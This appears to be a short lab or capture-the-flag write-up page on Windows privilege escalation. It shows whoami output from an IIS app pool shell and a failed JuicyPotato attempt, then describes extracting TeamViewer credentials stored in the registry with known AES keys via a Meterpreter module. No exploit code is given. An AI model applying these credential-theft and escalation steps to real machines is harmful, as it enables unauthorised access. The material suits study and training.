Enumeration

PS C:\windows\system32\inetsrv>whoami
iis apppool\defaultapppool

PS C:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

SeImpersonatePrivilege is enabled so, JuicyPotato it is. Lets try privesc ing.

Couldn't make it work. I should've checked the systeminfo, its running Server 2019 Standard.

Running the tasklists command I found TeamViewer running, which is a remote access software. It stores credentials in the registry.

I had to take hints from walkthroughs. And I found a reference to this link on the meterpreter payload to exploit TeamViewer. It stores the passwords encrypted with AES-128-CBC, with known keys and IV. Basically, we rely on password re-use, if we are able to extract the credentials from TeamViewer and potentially escalate privilege.

PreviousFoothold NextPrivEsc

Last updated 10 months ago